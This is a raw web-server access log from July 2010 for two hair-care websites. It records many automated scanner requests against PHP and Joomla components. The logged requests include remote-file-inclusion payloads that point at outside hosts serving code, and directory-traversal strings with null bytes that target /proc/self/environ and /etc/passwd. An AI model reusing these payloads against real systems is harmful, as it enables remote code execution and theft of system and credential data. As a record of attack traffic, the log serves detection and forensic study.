93.187.141.58 - - [12/Jul/2010:08:43:01 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:43:43 -0700] "GET /logs//extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:43:44 -0700] "GET /logs/access_100607.log%20%20//extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.187.141.58 - - [12/Jul/2010:08:43:44 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.159.121.188 - - [12/Jul/2010:08:44:23 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.freehairsecrets.com"
78.159.121.188 - - [12/Jul/2010:08:44:23 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.freehairsecrets.com"
195.191.40.23 - - [12/Jul/2010:08:45:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:08:47:00 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:47:03 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:08:47:49 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:48:49 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:48:49 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:48:49 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:08:48:58 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:49:02 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:49:02 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:08:49:02 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:08:50:37 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:08:51:11 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:08:51:26 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
89.31.116.66 - - [12/Jul/2010:08:54:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
89.31.116.66 - - [12/Jul/2010:08:54:25 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
67.195.37.176 - - [12/Jul/2010:08:55:23 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
75.0.184.219 - - [12/Jul/2010:09:03:19 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)" "freehairsecrets.com"
75.0.184.219 - - [12/Jul/2010:09:03:21 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.30729)" "freehairsecrets.com"
212.117.165.184 - - [12/Jul/2010:09:04:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:04:50 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:04:50 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:04:50 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
114.45.58.203 - - [12/Jul/2010:09:07:07 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 655360 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
114.45.58.203 - - [12/Jul/2010:09:07:07 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:09:11:13 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
117.53.96.161 - - [12/Jul/2010:09:12:34 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.freehairsecrets.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:12:56 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:12:56 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:12:56 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:17:07 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:17:07 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:17:07 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:19:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
72.3.233.173 - - [12/Jul/2010:09:20:33 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:20:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:21:00 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:21:00 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.71.248.74 - - [12/Jul/2010:09:21:00 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
143.107.142.226 - - [12/Jul/2010:09:22:07 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
143.107.142.226 - - [12/Jul/2010:09:22:07 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
143.107.142.226 - - [12/Jul/2010:09:22:07 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
72.3.233.173 - - [12/Jul/2010:09:23:02 -0700] "GET /logs/access.log//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
72.3.233.173 - - [12/Jul/2010:09:23:02 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
72.3.233.173 - - [12/Jul/2010:09:23:03 -0700] "GET /logs//index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:23:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:23:24 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
78.41.204.220 - - [12/Jul/2010:09:27:02 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:27:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:27:02 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
212.117.165.184 - - [12/Jul/2010:09:27:22 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:27:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:27:46 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [12/Jul/2010:09:27:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:27:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:29:05 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:29:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:29:05 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:09:30:15 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
91.142.209.202 - - [12/Jul/2010:09:30:45 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.142.209.202 - - [12/Jul/2010:09:30:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
143.107.142.226 - - [12/Jul/2010:09:33:24 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
98.158.182.124 - - [12/Jul/2010:09:35:09 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
98.158.182.124 - - [12/Jul/2010:09:35:09 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:38:20 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:38:20 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
78.41.204.220 - - [12/Jul/2010:09:38:20 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
66.135.41.16 - - [12/Jul/2010:09:41:32 -0700] "GET /logs/access_100614.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:32 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:32 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:32 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:44 -0700] "GET /logs/access_100614.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:45 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:45 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.135.41.16 - - [12/Jul/2010:09:41:45 -0700] "GET /logs/access_100412.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:42:39 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:42:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:42:39 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:44:40 -0700] "GET /logs/access_100705.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:11 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:13 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:14 -0700] "GET /logs/access_100628.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:46:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.228.235.93 - - [12/Jul/2010:09:47:50 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:47:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.228.235.93 - - [12/Jul/2010:09:47:50 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
124.115.1.7 - - [12/Jul/2010:09:50:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:09:50:06 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:50:07 -0700] "GET /logs/access_100705.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [12/Jul/2010:09:51:05 -0700] "GET /logs/access_100705.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.238.162.205 - - [12/Jul/2010:09:51:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://paps.fi/kuvia/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
